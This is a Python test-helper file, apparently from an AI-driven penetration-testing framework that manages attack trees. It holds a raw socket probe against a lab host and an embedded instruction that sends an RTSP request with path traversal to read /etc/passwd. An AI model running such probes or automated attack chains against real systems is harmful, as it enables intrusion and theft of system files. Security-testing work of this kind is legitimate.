# You cannot select more than 25 topics. Topics must start with a letter or number, can include dashes ('-'), and can be up to 35 characters long.
 
 
 
 

# 166 lines
# 5.4 KiB

import re
import subprocess
import tempfile
import os
import pexpect
import struct
import sys
import mysql.connector
import requests
from mycode.LLMManager import LLMManager
from mycode.TaskObject import TaskObject
from myutils.PickleManager import g_PKM
from mycode.InstructionManager import g_instrM
from mycode.TaskManager import g_TaskM
from mycode.PythonTManager import PythonTManager
from myutils.ConfigManager import myCongif
from mycode.DBManager import app_DBM
import textwrap
class Mytest:
    """Collection of ad-hoc helpers used for manual testing of this project."""

    def update_node_inter(self, attack_index):
        """Move one instruction from each of three fixed nodes to its parent.

        Reads the attack tree stored under ``attack_index`` through ``g_PKM``,
        pops one entry from the ``get_instr_user()`` list of each hard-coded
        node, appends it to the parent's ``get_instr_user()`` list, and writes
        the tree back under the same key.

        Args:
            attack_index: Key handed to ``g_PKM.ReadData`` and
                ``g_PKM.WriteData``.
        """
        attack_tree = g_PKM.ReadData(attack_index)
        nodes = attack_tree.traverse_dfs()
        # Each pair is (position in the DFS listing, index of the instruction
        # to move up to the parent). Order matches the original hand-written
        # sequence: 06-0, 39-1, 49-0.
        moves = ((6, 0), (39, 1), (49, 0))
        for node_pos, instr_pos in moves:
            node = nodes[node_pos]
            instr = node.get_instr_user().pop(instr_pos)
            node.parent.get_instr_user().append(instr)
        g_PKM.WriteData(attack_tree, attack_index)

    def dynamic_fun(self):
        """Send a fixed payload to 192.168.3.105:52989 and report the reply.

        Returns:
            ``(True, "SpecialCmd Response: <hex>")`` where ``<hex>`` is the
            hex encoding of up to 2048 received bytes, or ``(False, <text>)``
            carrying ``str(exception)`` if any step raises.
        """
        import socket
        try:
            # The context manager closes the socket even when connect/send/recv
            # raises; previously the socket leaked on every failure path.
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(20)  # extended timeout
                s.connect(("192.168.3.105", 52989))
                # Special payload built from the returned "99 -1 45973" string;
                # meant to imitate the protocol header.
                # NOTE(review): the doubled backslashes make this the literal
                # text `99\x01\x00\x00\x00`, not "99" followed by the bytes
                # 0x01 0x00 0x00 0x00 - confirm which one is intended.
                special_cmd = b'99\\x01\\x00\\x00\\x00'
                s.sendall(special_cmd)
                response = s.recv(2048)
            return (True, f"SpecialCmd Response: {response.hex()}")
        except Exception as e:
            # Best-effort probe: every failure is reported as a result tuple.
            return (False, str(e))

    def do_test(self):
        """Placeholder; intentionally does nothing."""
        pass

    def tmp_test(self):
        """Print the last four items of a sample list, warning on an odd start.

        The start offset is ``len(list_a) - 4``; a warning is printed when
        that offset is odd, then every item from the offset onward is printed.
        """
        list_a = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
        isart = len(list_a) - 4  # normally the entries should come in pairs
        if isart % 2 != 0:
            print("c_msg数量不对称,需要检查逻辑!")
        for msg in list_a[isart:]:
            print(msg)
def _unique_node_names(names_text):
    """Split a comma-separated string into trimmed, unique, non-empty names.

    Args:
        names_text: Names separated by ``,`` with optional surrounding
            whitespace.

    Returns:
        The distinct names in first-seen order.
    """
    trimmed = (name.strip() for name in names_text.split(","))
    # dict.fromkeys de-duplicates while keeping insertion order.
    return list(dict.fromkeys(name for name in trimmed if name))


if __name__ == "__main__":
    # Example usage: pick the scenario to run by editing test_type below.
    mytest = Mytest()
    LLM = LLMManager(1)
    current_path = os.path.dirname(os.path.realpath(__file__))
    print(current_path)
    test_type = 1
    task_id = 49
    task_Object = TaskObject("test_target", "cookie_info", 1, 1, 1, "local_ip", "", None)
    if test_type == 0:
        mytest.dynamic_fun()
    elif test_type == 1:
        # Get details of all custom functions.
        # HIGH_RISK_FUNCTIONS = ['eval', 'exec', 'os.system', 'subprocess.call', 'subprocess.Popen']
        #
        # NOTE(review): inside the instruction text below, the doubled
        # backslashes mean the executed code builds a payload containing the
        # literal characters `\r\n` rather than CR LF line terminators -
        # confirm whether that is intended.
        instruction = '''python-code
def dynamic_fun():
    import socket
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(20) # 设置超时时间为20秒
        s.connect(("192.168.3.105", 11200))
        # 发送畸形RTSP请求探测边界条件
        payload = "DESCRIBE rtsp://192.168.3.105/../../../../etc/passwd RTSP/1.0\\\\r\\\\n"
        payload += "CSeq: 6\\\\r\\\\n\\\\r\\\\n"
        s.send(payload.encode())
        response = s.recv(4096).decode()
        s.close()
        if "404" in response:
            return (False, "存在输入过滤机制")
        elif "root:" in response:
            return (True, "成功读取敏感文件")
        else:
            return (False, f"未知响应:{response}")
    except Exception as e:
        return (False, f"连接异常:{str(e)}")
'''
        task_Object.PythonM.start_pool()  # starting the worker pool is enough here
        start_time, end_time, bsuccess, instr, reslut, source_result, ext_params = task_Object.do_instruction(instruction)
        # Stash the result
        oneres = {'执行指令': instr, '结果': reslut}
        print("----执行结果----")
        print(reslut)
    elif test_type == 2:  # attach an instruction to a node
        node_path = "目标系统->192.168.3.105->52989端口"
        instr_id = 3233
        g_TaskM.load_tasks()
        task = g_TaskM.tasks[task_id]
        nodes = task.attack_tree.traverse_dfs()
        # First node whose path matches, or None when there is no match.
        cur_node = next((node for node in nodes if node.path == node_path), None)
        if cur_node:
            str_instr = app_DBM.get_one_instr(instr_id)
            if "import" in str_instr:
                str_instr = "python-code " + str_instr
            cur_node.test_add_instr(str_instr)
            cur_node.update_work_status(1)
            # Persist the modified tree
            g_PKM.WriteData(task.attack_tree, str(task.task_id))
        else:
            print("没找到节点!")
    elif test_type == 3:  # test feeding instructions into nodes
        strinstr = '''
'''
        strNodes = "执行系统命令探测,权限提升尝试,横向移动测试"
        # The list is separated by bare commas; splitting on ', ' (comma plus
        # space) never matched, so the names were not separated at all.
        unique_names = _unique_node_names(strNodes)
        for node_name in unique_names:
            print(node_name)
    elif test_type == 4:  # rewrite stored messages
        attact_tree = g_PKM.ReadData("27")
        # Build a fresh node to obtain a newly generated first message
        from mycode.AttackMap import TreeNode
        testnode = TreeNode("test", 0)
        LLM.build_initial_prompt(testnode)  # the new message
        systems = testnode.parent_messages[0]["content"]
        # print(systems)
        # Walk every node and overwrite the content of its first message
        nodes = attact_tree.traverse_bfs()
        for node in nodes:
            node.parent_messages[0]["content"] = systems
        g_PKM.WriteData(attact_tree, "27")
        print("完成Messgae更新")
    elif test_type == 5:
        mytest.dynamic_fun()
    elif test_type == 6:
        mytest.tmp_test()
    else:
        pass